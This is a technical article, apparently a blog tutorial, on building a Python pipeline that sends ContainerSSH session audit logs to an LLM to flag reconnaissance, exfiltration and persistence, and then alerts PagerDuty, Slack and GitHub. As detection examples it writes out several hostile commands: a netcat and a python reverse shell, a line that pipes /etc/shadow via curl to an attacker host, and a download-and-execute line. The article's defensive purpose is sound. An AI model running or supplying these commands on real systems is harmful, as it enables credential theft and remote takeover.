AI-Powered SSH Session Anomaly Detection: Analysing ContainerSSH Audit Logs with LLMs
The Problem
Your SIEM fires on nc -e /bin/bash 10.0.0.1 4444. Except the attacker isn’t running that exact command. They’re running python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444))'. Or they’re running ncat. Or they’re using socat. Or they’ve dropped a statically-linked binary called worker that opens a reverse shell and they’re invoking it by a name that matches no known-bad hash.
The rule fires on the known signature. The attacker uses the unknown variant. This is the fundamental limitation of signature-based detection for interactive SSH sessions: it scales with attacker creativity, and attackers are creative.
The gap is not data. ContainerSSH’s audit logging captures everything — every command typed, every line of output returned, every file opened within the container, the exact bytes sent and received over the SSH channel. If a security analyst sat down and read a twenty-minute session recording in full, they would recognise reconnaissance behaviour, even if every individual command was individually benign. cat /etc/passwd is legitimate. uname -a is legitimate. ps aux is legitimate. netstat -an is legitimate. find / -perm -4000 -type f 2>/dev/null is legitimate in isolation. Run all five in the first ninety seconds of a session by a user who has never logged in before, from a source IP that has never appeared in your fleet, and a competent analyst calls it immediately: that’s reconnaissance.
The analyst would recognise it. A SIEM rule based on any individual command would not. The context — the sequence, the timing, the combination — carries the signal. Large language models process exactly this kind of structured-text context well. They have been trained on security incident reports, CTF write-ups, penetration testing guides, and threat intelligence feeds. They recognise attack patterns holistically, not through exact-match signatures. The goal of this article is to build a pipeline that routes ContainerSSH session recordings through an LLM and produces structured, actionable findings — not to replace analyst judgment, but to flag sessions that warrant it, at machine speed.
Target systems: ContainerSSH with audit logging enabled, any LLM API (Anthropic Claude or OpenAI GPT-4), PagerDuty, Slack, and optionally JIRA or GitHub Issues for incident tracking.
Threat Model
Reconnaissance via individually innocuous commands. An attacker who gains SSH access to a container runs a series of standard system administration commands — id, whoami, uname -a, cat /etc/os-release, cat /etc/passwd, env, ls -la /, find / -name "*.conf" 2>/dev/null, netstat -an, ps aux. No single command is unusual. A junior analyst reviewing a SIEM alert for any one of them would close it as a false positive. But the sequence, run in the first two minutes of a session by an account that has never historically logged in, constitutes a textbook initial-access reconnaissance pattern. An LLM evaluating the full session transcript recognises this immediately.
Slow data exfiltration via small repeated transfers. Threshold-based detection catches large curl calls moving gigabytes of data. It misses an attacker who runs twenty curl calls over fifteen minutes, each moving a few kilobytes of configuration data to an external IP, each individually below every alert threshold. The cumulative pattern — repeated outbound connections to the same external endpoint, with Base64-encoded payloads — is visible in the session transcript. The LLM evaluates the full session, not individual events against thresholds.
Novel binary execution. The attacker transfers a statically-linked binary named svchost or kworker or worker using curl or wget, marks it executable with chmod +x, executes it, and cleans up the binary with rm. No hash matches any known-malicious binary. No process name matches any blocklist. But the behaviour sequence — download, chmod, execute, delete — is a well-documented attacker pattern and is immediately legible in the session transcript to any model that has been trained on security content.
Configuration and Implementation
ContainerSSH Audit Log Format
ContainerSSH’s audit log is written as a sequence of CBOR-encoded messages (or optionally JSON-lines, depending on audit log backend configuration). Each message records a timestamped event in the SSH session: channel open, exec request, PTY allocation, data sent by the client, data sent by the server, channel close. The full message structure is defined in the ContainerSSH audit log specification.
For this pipeline, the relevant fields are:
type: message type —connect,disconnect,auth,channel,io(stdin/stdout/stderr data),exectimestamp: nanosecond-precision Unix timestampchannel_id: which SSH channel the event belongs tocontent: forioevents, the raw bytes sent or received; forexecevents, the command string
The pipeline targets the JSON-lines audit format. Enable it in ContainerSSH’s config.yaml:
audit:
enable: true
format: binary
storage:
s3:
local: false
region: eu-west-1
bucket: your-audit-log-bucket
prefix: containerssh/audit/
accessKey: "" # use IAM role
secretKey: ""
cacert: ""
endpoint: ""
pathStyleAccess: false
uploadPartSize: 5242880
parallelUploads: 4
For local development and testing, use the file backend and binary format. ContainerSSH ships with containerssh-auditlog-decoder to convert the binary audit format to JSON. The pipeline below calls this decoder as a subprocess, or you can pre-decode files before ingestion.
Session Log Ingestion and Pre-Processing
#!/usr/bin/env python3
"""
containerssh_session_analyser.py
Reads a ContainerSSH audit log (decoded JSON-lines format),
builds a structured session transcript, calls an LLM for
anomaly analysis, and routes alerts to PagerDuty / Slack.
Requirements:
pip install anthropic httpx python-dotenv
"""
import json
import re
import subprocess
import sys
from dataclasses import dataclass, field
from datetime import datetime, timezone
from pathlib import Path
from typing import Any
import httpx
from anthropic import Anthropic
# ---------------------------------------------------------------------------
# Secret patterns to redact before sending any data to an external LLM API.
# These are applied to both command lines and command outputs.
# ---------------------------------------------------------------------------
REDACT_PATTERNS = [
re.compile(r'(?i)(password|passwd|pass)\s*[=:]\s*\S+'),
re.compile(r'(?i)(token|api_key|apikey|secret|auth)\s*[=:]\s*\S+'),
re.compile(r'(?i)(aws_access_key_id|aws_secret_access_key)\s*[=:]\s*\S+'),
re.compile(r'-----BEGIN [A-Z ]+-----[\s\S]+?-----END [A-Z ]+-----'),
re.compile(r'[A-Za-z0-9+/]{40,}={0,2}'), # long base64 blobs (likely key material)
]
MAX_OUTPUT_CHARS = 500 # truncate per-command output beyond this length
MAX_TRANSCRIPT_CHARS = 12_000 # hard cap on total transcript before LLM call
@dataclass
class SessionEvent:
timestamp_ns: int
event_type: str
data: str
@dataclass
class SessionMetadata:
session_id: str
username: str
source_ip: str
source_port: int
start_time: datetime
end_time: datetime | None
duration_seconds: float
audit_log_path: str
s3_replay_url: str = ""
@dataclass
class ParsedSession:
metadata: SessionMetadata
events: list[SessionEvent] = field(default_factory=list)
transcript: str = ""
def decode_audit_log(audit_log_path: Path) -> list[dict]:
"""
Decode a ContainerSSH binary audit log to JSON-lines using the
containerssh-auditlog-decoder tool, then parse each line.
Falls back to treating the file as already-decoded JSON-lines if
the decoder is not installed.
"""
try:
result = subprocess.run(
["containerssh-auditlog-decoder", str(audit_log_path)],
capture_output=True,
text=True,
timeout=30,
)
lines = result.stdout.strip().split("\n")
except FileNotFoundError:
# Decoder not installed — assume file is already JSON-lines
lines = audit_log_path.read_text().strip().split("\n")
events = []
for line in lines:
line = line.strip()
if not line:
continue
try:
events.append(json.loads(line))
except json.JSONDecodeError:
continue
return events
def redact_sensitive_data(text: str) -> str:
"""Apply all redaction patterns to a string before LLM submission."""
for pattern in REDACT_PATTERNS:
text = pattern.sub("[REDACTED]", text)
return text
def strip_ansi_escapes(text: str) -> str:
"""Remove ANSI terminal escape codes from command output."""
ansi_escape = re.compile(
r'(?:\x1B[@-Z\\-_]|[\x80-\x9A\x9C-\x9F]|(?:\x1B\[|\x9B)[0-?]*[ -/]*[@-~])'
)
return ansi_escape.sub("", text)
def parse_audit_log(
audit_log_path: Path,
session_id: str,
username: str,
source_ip: str,
source_port: int,
s3_replay_url: str = "",
) -> ParsedSession:
"""
Parse a decoded ContainerSSH audit log into a structured session
with a human-readable transcript suitable for LLM analysis.
"""
raw_events = decode_audit_log(audit_log_path)
if not raw_events:
raise ValueError(f"No events decoded from {audit_log_path}")
# Extract timestamps for session duration
timestamps = [e.get("timestamp", 0) for e in raw_events if "timestamp" in e]
start_ns = min(timestamps) if timestamps else 0
end_ns = max(timestamps) if timestamps else 0
start_dt = datetime.fromtimestamp(start_ns / 1e9, tz=timezone.utc)
end_dt = datetime.fromtimestamp(end_ns / 1e9, tz=timezone.utc)
duration = (end_ns - start_ns) / 1e9
metadata = SessionMetadata(
session_id=session_id,
username=username,
source_ip=source_ip,
source_port=source_port,
start_time=start_dt,
end_time=end_dt,
duration_seconds=duration,
audit_log_path=str(audit_log_path),
s3_replay_url=s3_replay_url,
)
# Group IO events by channel: reconstruct command→output pairs
# ContainerSSH emits exec events (command string) and io events (stdin/stdout bytes)
channel_commands: dict[str, list[dict]] = {}
for event in raw_events:
channel = str(event.get("channel_id", "0"))
if channel not in channel_commands:
channel_commands[channel] = []
channel_commands[channel].append(event)
transcript_lines: list[str] = [
f"=== SSH Session Transcript ===",
f"User: {username}",
f"Source IP: {source_ip}:{source_port}",
f"Session ID: {session_id}",
f"Start: {start_dt.isoformat()}",
f"Duration: {duration:.1f}s",
"",
]
# Build ordered event list from all channels
all_events = sorted(raw_events, key=lambda e: e.get("timestamp", 0))
current_command = None
output_buffer: list[str] = []
for event in all_events:
event_type = event.get("type", "")
ts_ns = event.get("timestamp", 0)
ts_rel = (ts_ns - start_ns) / 1e9 # relative seconds from session start
if event_type == "exec":
# Flush previous command + output
if current_command is not None:
output = "".join(output_buffer).strip()
output = strip_ansi_escapes(output)
output = redact_sensitive_data(output)
if len(output) > MAX_OUTPUT_CHARS:
output = output[:MAX_OUTPUT_CHARS] + f"\n[...truncated, {len(output) - MAX_OUTPUT_CHARS} chars omitted]"
transcript_lines.append(f"[+{ts_rel:.1f}s] $ {current_command}")
if output:
transcript_lines.append(output)
output_buffer = []
cmd = event.get("command", "").strip()
cmd = redact_sensitive_data(cmd)
current_command = cmd
elif event_type == "io":
direction = event.get("direction", "")
content = event.get("content", "")
# Only capture stdout/stderr (direction == "send" is server→client)
if direction in ("send", "server_to_client", "stdout", "stderr"):
if isinstance(content, bytes):
content = content.decode("utf-8", errors="replace")
output_buffer.append(content)
# Flush final command
if current_command is not None:
output = "".join(output_buffer).strip()
output = strip_ansi_escapes(output)
output = redact_sensitive_data(output)
if len(output) > MAX_OUTPUT_CHARS:
output = output[:MAX_OUTPUT_CHARS] + f"\n[...truncated, {len(output) - MAX_OUTPUT_CHARS} chars omitted]"
transcript_lines.append(f"$ {current_command}")
if output:
transcript_lines.append(output)
transcript_lines.append("\n=== End of Session ===")
full_transcript = "\n".join(transcript_lines)
# Hard cap on total transcript length
if len(full_transcript) > MAX_TRANSCRIPT_CHARS:
full_transcript = full_transcript[:MAX_TRANSCRIPT_CHARS] + "\n[...transcript truncated at hard limit]"
session = ParsedSession(metadata=metadata, transcript=full_transcript)
return session
LLM Prompt Design and Structured Output
The prompt instructs the model to act as a security analyst and produce a structured JSON assessment. The system prompt is kept stable across sessions; only the transcript changes in the user turn.
SYSTEM_PROMPT = """You are a security analyst specialising in SSH session forensics and attacker behaviour analysis. You will be given a transcript of an SSH session from a containerised bastion host. Your task is to analyse the session and identify attacker behaviour patterns.
Evaluate the session for the following threat categories:
1. RECONNAISSANCE — systematic information gathering: host enumeration (uname, id, whoami, hostname), network mapping (netstat, ss, ip route, arp), user/group enumeration (/etc/passwd, /etc/shadow, getent), process listing (ps, pstree), SUID/SGID binary search (find with -perm), environment variable dumping (env, printenv), unusual file system traversal.
2. EXFILTRATION — data leaving the host: outbound curl/wget/nc to external IPs, base64 encoding of file contents before transfer, repeated small transfers to the same endpoint, reading sensitive files (/etc/shadow, ~/.ssh/*, config files containing credentials), DNS-based exfiltration patterns.
3. PRIVILEGE ESCALATION — attempts to gain elevated access: sudo invocations (especially sudo -l, sudo su, sudo bash), exploitation of SUID binaries, manipulation of /etc/sudoers or /etc/passwd, kernel exploit tool execution, capability manipulation (capsh, setcap).
4. PERSISTENCE — mechanisms to maintain access after session end: SSH key addition to ~/.ssh/authorized_keys, crontab modification (crontab -e, writing to /etc/cron.*), systemd unit file creation (/etc/systemd/system/), web shell deployment, modification of shell startup files (.bashrc, .profile).
5. LATERAL MOVEMENT — tools and patterns for moving to other hosts: SSH key discovery and use (ssh-keygen, ssh to internal IPs), internal network scanning (nmap against RFC1918 ranges), credential harvesting from memory or files, use of cloud provider metadata endpoints (169.254.169.254).
Consider the full session holistically. Individual commands may be legitimate; sequences and combinations reveal intent. A session that opens with six information-gathering commands from an account with no login history is suspicious even if each command is benign in isolation.
Respond with a JSON object matching this exact schema:
{
"risk_level": "critical|high|medium|low|benign",
"confidence": "high|medium|low",
"summary": "One or two sentence plain-English summary of what happened in this session.",
"findings": [
{
"category": "reconnaissance|exfiltration|privilege_escalation|persistence|lateral_movement",
"severity": "critical|high|medium|low",
"command": "The specific command or command sequence that triggered this finding",
"rationale": "Why this command or sequence is suspicious in context",
"timestamp_relative": "Approximate time offset from session start (e.g. +12s)"
}
],
"recommended_action": "none|monitor|alert_soc|page_oncall|isolate_container",
"false_positive_indicators": "Brief note on what would make this a false positive, or empty string if none."
}
If the session appears to be normal administrative activity, set risk_level to benign or low, findings to an empty list, and recommended_action to none.
Return only the JSON object. Do not add prose before or after it."""
def analyse_session_with_llm(session: ParsedSession) -> dict[str, Any]:
"""
Submit the session transcript to the LLM and return the parsed
structured JSON finding. Raises on API error or schema violation.
"""
client = Anthropic()
user_message = f"""Please analyse this SSH session transcript for attacker behaviour patterns.
{session.transcript}"""
response = client.messages.create(
model="claude-sonnet-4-5",
max_tokens=2048,
system=SYSTEM_PROMPT,
messages=[{"role": "user", "content": user_message}],
)
raw_output = response.content[0].text.strip()
# Strip markdown code fences if the model wrapped the JSON
if raw_output.startswith("```"):
raw_output = re.sub(r'^```[a-z]*\n?', '', raw_output)
raw_output = re.sub(r'\n?```$', '', raw_output)
try:
finding = json.loads(raw_output)
except json.JSONDecodeError as exc:
raise ValueError(
f"LLM returned non-JSON output. Raw response:\n{raw_output}"
) from exc
# Validate required fields
required_fields = {"risk_level", "confidence", "summary", "findings", "recommended_action"}
missing = required_fields - set(finding.keys())
if missing:
raise ValueError(f"LLM output missing required fields: {missing}")
valid_risk_levels = {"critical", "high", "medium", "low", "benign"}
if finding["risk_level"] not in valid_risk_levels:
raise ValueError(f"Invalid risk_level: {finding['risk_level']!r}")
return finding
Alerting Integration
PAGERDUTY_ROUTING_KEY = "your-pagerduty-integration-key"
SLACK_WEBHOOK_URL = "https://hooks.slack.com/services/T.../B.../..."
GITHUB_TOKEN = "ghp_..."
GITHUB_REPO = "your-org/security-incidents"
def send_pagerduty_alert(session: ParsedSession, finding: dict) -> str:
"""
Fire a PagerDuty incident for CRITICAL findings.
Returns the PagerDuty dedup_key for the created incident.
"""
dedup_key = f"containerssh-{session.metadata.session_id}"
payload = {
"routing_key": PAGERDUTY_ROUTING_KEY,
"event_action": "trigger",
"dedup_key": dedup_key,
"payload": {
"summary": (
f"[CRITICAL] Attacker behaviour in SSH session: "
f"{session.metadata.username}@{session.metadata.source_ip} — "
f"{finding['summary']}"
),
"severity": "critical",
"source": f"containerssh/{session.metadata.session_id}",
"custom_details": {
"session_id": session.metadata.session_id,
"username": session.metadata.username,
"source_ip": session.metadata.source_ip,
"duration_seconds": session.metadata.duration_seconds,
"llm_risk_level": finding["risk_level"],
"llm_confidence": finding["confidence"],
"findings_count": len(finding["findings"]),
"recommended_action": finding["recommended_action"],
"session_replay_url": session.metadata.s3_replay_url,
},
},
}
with httpx.Client() as client:
resp = client.post(
"https://events.pagerduty.com/v2/enqueue",
json=payload,
timeout=10,
)
resp.raise_for_status()
return dedup_key
def send_slack_alert(session: ParsedSession, finding: dict) -> None:
"""Send a Slack notification for HIGH findings."""
colour = {"critical": "#FF0000", "high": "#FF6600", "medium": "#FFCC00"}.get(
finding["risk_level"], "#CCCCCC"
)
findings_text = "\n".join(
f"• *{f['category'].upper()}* ({f['severity']}): `{f['command']}` — {f['rationale']}"
for f in finding["findings"][:5] # cap at 5 findings in Slack message
)
blocks = {
"attachments": [
{
"color": colour,
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": (
f":warning: *SSH Anomaly Detected*\n"
f"*Risk:* {finding['risk_level'].upper()} "
f"(confidence: {finding['confidence']})\n"
f"*User:* `{session.metadata.username}` "
f"from `{session.metadata.source_ip}`\n"
f"*Session ID:* `{session.metadata.session_id}`\n"
f"*Duration:* {session.metadata.duration_seconds:.0f}s\n"
f"*Summary:* {finding['summary']}"
),
},
},
{
"type": "section",
"text": {"type": "mrkdwn", "text": f"*Findings:*\n{findings_text}"},
},
{
"type": "actions",
"elements": [
{
"type": "button",
"text": {"type": "plain_text", "text": "View Session Replay"},
"url": session.metadata.s3_replay_url or "#",
}
],
},
],
}
]
}
with httpx.Client() as client:
resp = client.post(SLACK_WEBHOOK_URL, json=blocks, timeout=10)
resp.raise_for_status()
def create_github_incident(session: ParsedSession, finding: dict) -> str:
"""
Create a GitHub Issue for the incident with structured body and
a link to the session replay URL. Returns the issue URL.
"""
findings_md = "\n".join(
f"| `{f['command']}` | {f['category']} | {f['severity']} | {f['rationale']} |"
for f in finding["findings"]
)
body = f"""## SSH Session Anomaly — {finding["risk_level"].upper()}
**Session ID:** `{session.metadata.session_id}`
**User:** `{session.metadata.username}`
**Source IP:** `{session.metadata.source_ip}:{session.metadata.source_port}`
**Session start:** {session.metadata.start_time.isoformat()}
**Duration:** {session.metadata.duration_seconds:.0f}s
**LLM confidence:** {finding["confidence"]}
### Summary
{finding["summary"]}
### Findings
| Command | Category | Severity | Rationale |
|---------|----------|----------|-----------|
{findings_md}
### Recommended Action
`{finding["recommended_action"]}`
### False Positive Indicators
{finding.get("false_positive_indicators") or "_None identified._"}
### Session Replay
[View full session recording]({session.metadata.s3_replay_url or "_S3 URL not available_"})
---
_Generated by containerssh-session-analyser. Requires analyst review before escalation._
"""
headers = {
"Authorization": f"Bearer {GITHUB_TOKEN}",
"Accept": "application/vnd.github+json",
"X-GitHub-Api-Version": "2022-11-28",
}
payload = {
"title": (
f"[SSH Anomaly] {finding['risk_level'].upper()} — "
f"{session.metadata.username}@{session.metadata.source_ip}"
),
"body": body,
"labels": ["security", "ssh-anomaly", finding["risk_level"]],
}
with httpx.Client() as client:
resp = client.post(
f"https://api.github.com/repos/{GITHUB_REPO}/issues",
headers=headers,
json=payload,
timeout=15,
)
resp.raise_for_status()
return resp.json()["html_url"]
def route_alerts(session: ParsedSession, finding: dict) -> None:
"""
Route the finding to the appropriate alerting channels based on risk level.
CRITICAL → PagerDuty + Slack + GitHub Issue
HIGH → Slack + GitHub Issue
MEDIUM → GitHub Issue only
LOW/BENIGN → no action
"""
risk = finding["risk_level"]
if risk == "critical":
send_pagerduty_alert(session, finding)
send_slack_alert(session, finding)
issue_url = create_github_incident(session, finding)
print(f"[CRITICAL] Incident created: {issue_url}")
elif risk == "high":
send_slack_alert(session, finding)
issue_url = create_github_incident(session, finding)
print(f"[HIGH] Slack alert sent. Issue: {issue_url}")
elif risk == "medium":
issue_url = create_github_incident(session, finding)
print(f"[MEDIUM] GitHub issue created: {issue_url}")
else:
print(f"[{risk.upper()}] No alerts triggered.")
Main Pipeline
def run_pipeline(
audit_log_path: str,
session_id: str,
username: str,
source_ip: str,
source_port: int = 22,
s3_replay_url: str = "",
) -> dict[str, Any]:
"""
Full pipeline: ingest → pre-process → LLM analyse → alert.
Falls back to a stub finding on LLM API failure so that
downstream rule-based detection still runs.
"""
path = Path(audit_log_path)
if not path.exists():
raise FileNotFoundError(f"Audit log not found: {audit_log_path}")
print(f"[pipeline] Parsing session {session_id} from {path.name}")
session = parse_audit_log(
path, session_id, username, source_ip, source_port, s3_replay_url
)
print(f"[pipeline] Transcript length: {len(session.transcript)} chars")
try:
print("[pipeline] Submitting to LLM for analysis")
finding = analyse_session_with_llm(session)
print(f"[pipeline] LLM result: risk_level={finding['risk_level']}, findings={len(finding['findings'])}")
except Exception as exc:
print(f"[pipeline] LLM analysis failed ({exc}), falling back to rule-based stub")
# Fallback: emit a low-risk stub so rule-based SIEM still ingests
finding = {
"risk_level": "low",
"confidence": "low",
"summary": "LLM analysis unavailable. Manual review required.",
"findings": [],
"recommended_action": "monitor",
"false_positive_indicators": "",
"_llm_error": str(exc),
}
route_alerts(session, finding)
return finding
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Analyse a ContainerSSH audit log with an LLM.")
parser.add_argument("audit_log", help="Path to decoded ContainerSSH audit log (JSON-lines)")
parser.add_argument("--session-id", required=True)
parser.add_argument("--username", required=True)
parser.add_argument("--source-ip", required=True)
parser.add_argument("--source-port", type=int, default=22)
parser.add_argument("--s3-replay-url", default="")
args = parser.parse_args()
result = run_pipeline(
args.audit_log,
args.session_id,
args.username,
args.source_ip,
args.source_port,
args.s3_replay_url,
)
print(json.dumps(result, indent=2))
Triggering the Pipeline from ContainerSSH
ContainerSSH supports a webhook on session disconnect. Configure a lightweight HTTP handler (a simple Flask or FastAPI endpoint) that receives the disconnect event, fetches the completed audit log from S3, and invokes the pipeline:
# ContainerSSH config.yaml — webhook on disconnect
server:
listen: "0.0.0.0:2222"
hostkeys:
- /etc/containerssh/host_ed25519_key
auth:
webhook:
url: http://auth-service:8080/auth
backend:
type: kubernetes
# Webhook fired on session events including disconnect
configserver:
url: http://config-service:8080/config
audit:
enable: true
format: binary
intercept:
stdin: true
stdout: true
stderr: true
passwords: false # never record passwords — protocol-level protection
The disconnect webhook carries sessionId, username, remoteAddr. Your handler constructs the S3 key from the session ID (ContainerSSH writes audit logs under a path derived from the session ID), generates a pre-signed URL for session replay, and calls run_pipeline.
Expected Behaviour
| Session Pattern | LLM Risk Level | Action Triggered |
|---|---|---|
Normal admin: ls, git pull, systemctl status app, exit |
benign | None |
Reconnaissance sequence: id, uname -a, cat /etc/passwd, find / -perm -4000, netstat -an within first 2 minutes, no prior login history |
high | Slack alert + GitHub issue |
Exfiltration attempt: cat /etc/shadow | base64 | curl -d @- https://attacker.example.com/collect |
critical | PagerDuty page + Slack + GitHub issue |
Novel binary execution: curl http://185.x.x.x/worker -o /tmp/worker && chmod +x /tmp/worker && /tmp/worker & |
critical | PagerDuty page + Slack + GitHub issue |
Slow exfiltration: 20 curl calls over 15 minutes to same external IP, each moving a small config fragment |
high | Slack alert + GitHub issue |
| Sysadmin checking SUID binaries as part of documented hardening task (matches change ticket context) | medium or high | GitHub issue only — analyst verifies change ticket, closes as false positive |
Automated deployment script running as service account: kubectl apply, helm upgrade |
low or benign | None |
The “sysadmin false positive” row is important. An experienced sysadmin auditing SUID binaries runs commands identical to a reconnaissance sequence. The LLM will often flag this as medium or high because the commands match the threat pattern. The false_positive_indicators field in the structured output should contain a note like “This activity is consistent with a security audit — verify against change management records.” The analyst reviews this, matches against an open change ticket, and closes the GitHub issue without escalation. This is the intended workflow: the LLM flags for human review, the human provides the context the LLM cannot access.
Trade-offs
| Dimension | Detail | Implication |
|---|---|---|
| Latency: post-session analysis | The LLM analyses the session after the SSH disconnect event. Analysis completes in 3–15 seconds depending on session length and LLM API latency. The attacker has already exited. | This pipeline detects and records; it does not block. Real-time blocking requires a different architecture (streaming analysis, which multiplies cost). For most threat models, post-session detection with fast alerting is sufficient — the session happened in a container that is discarded at disconnect. |
| Token cost per session | A 20-minute session transcript at 500-char output truncation is approximately 2,000–4,000 tokens. At Claude Sonnet pricing (~$3/million input tokens), analysis costs $0.006–$0.012 per session. A fleet handling 1,000 SSH sessions/day incurs ~$6–$12/day in LLM costs. | Cost scales linearly with session volume. Evaluate against SIEM analyst hourly rates. Pre-filter benign sessions (known-good service accounts, CI/CD automation) before LLM submission to reduce volume by 60–80%. |
| False positive rate vs. rule-based detection | LLMs produce more false positives on ambiguous sessions than well-tuned SIEM rules. An LLM may flag a database administrator running find / -name "*.cnf" as reconnaissance. A tuned rule would not. |
Tune recommended_action routing to add friction before paging: MEDIUM findings go to GitHub issues only; only CRITICAL findings page on-call. Analyst review of GitHub issues is lower-urgency than a 3am PagerDuty page. |
| External LLM API (data privacy) | Sending session transcripts to Anthropic or OpenAI means command sequences and output snippets leave your perimeter. Even with redaction, an attacker’s lateral movement reveals internal network topology. | For environments with strict data residency requirements, deploy a local model (Mistral, LLaMA, CodeLlama) via vLLM or Ollama. Local models have lower accuracy on novel attack patterns and require GPU infrastructure. Evaluate against compliance requirements. |
| Redaction completeness | The regex-based redaction in this pipeline catches common patterns. It will not catch all secret formats — a custom API token format, an internal JWT structure, or a proprietary credential format may pass through unredacted. | Audit redaction patterns against your actual credential formats before deploying to production. Consider a second-pass DLP scan (AWS Macie, Google Cloud DLP) on the pre-LLM transcript before submission. |
Failure Modes
| Failure | Trigger | Impact | Mitigation |
|---|---|---|---|
| LLM API unavailable | Anthropic/OpenAI service outage, network partition, rate limit exceeded | No LLM analysis for sessions during outage window. Sessions analysed during outage are not retroactively re-analysed by default. | The pipeline falls back to a low/monitor stub finding, preserving the session transcript. Implement a retry queue (SQS, Redis) that re-submits sessions for analysis when the API recovers. Alert on LLM API error rate. |
| Session transcript too long | A 4-hour maintenance session, a session with extremely verbose command output, or an attacker running a large compilation | The hard cap at MAX_TRANSCRIPT_CHARS truncates the transcript. Commands at the end of the session — potentially including persistence mechanisms installed before the attacker exited — are lost. |
Increase MAX_TRANSCRIPT_CHARS cautiously (cost increases). Implement a sliding-window strategy: analyse the first 6,000 and last 6,000 chars separately, then aggregate findings. Flag truncated sessions explicitly in the incident ticket. |
| Secrets inadvertently sent to LLM API | A novel credential format not covered by redaction patterns; attacker pipes /etc/shadow and the hash is not matched by any redaction regex |
Credential material reaches the LLM provider’s API. May be logged, stored in provider telemetry, or retained for training depending on provider data retention policies. | Audit credential formats against redaction regexes quarterly. Consider a dedicated secrets-scanning library (Trufflesecurity secrets library, AWS Macie batch analysis) as a pre-send gate. Enable LLM provider’s zero-data-retention API tier if available. |
| Structured output schema violation | The LLM returns valid JSON that does not match the expected schema — extra fields, wrong enum value, missing required field — or wraps the JSON in markdown | analyse_session_with_llm raises ValueError, pipeline falls back to stub finding, session is not alerted on |
Add a pydantic model for response validation. Implement retry with an explicit correction prompt: “Your previous response had schema errors: {errors}. Please return only the valid JSON.” Cap retries at 2. |
| High false positive rate causing alert fatigue | LLM flags every sysadmin session that touches SUID binaries or network tools as HIGH, resulting in 50 GitHub issues per day | Analysts stop reviewing issues. Real incidents are buried. Detection value collapses to near zero. | Calibrate risk thresholds against two weeks of real session data before going live. Implement feedback loop: analysts mark GitHub issues as false-positive; feed these back to a few-shot prompt library that the system prompt references. Review Slack alert and PagerDuty volume weekly. |
| Audit log unavailable | S3 bucket permissions error, ContainerSSH crash before log flush, network partition during log upload | Session is not analysed at all — no finding, no alert, no incident ticket | Alert on missing audit logs for sessions observed in ContainerSSH connection metrics. A session that connected but has no corresponding audit log object after 60 seconds is itself a monitoring event worth alerting on. |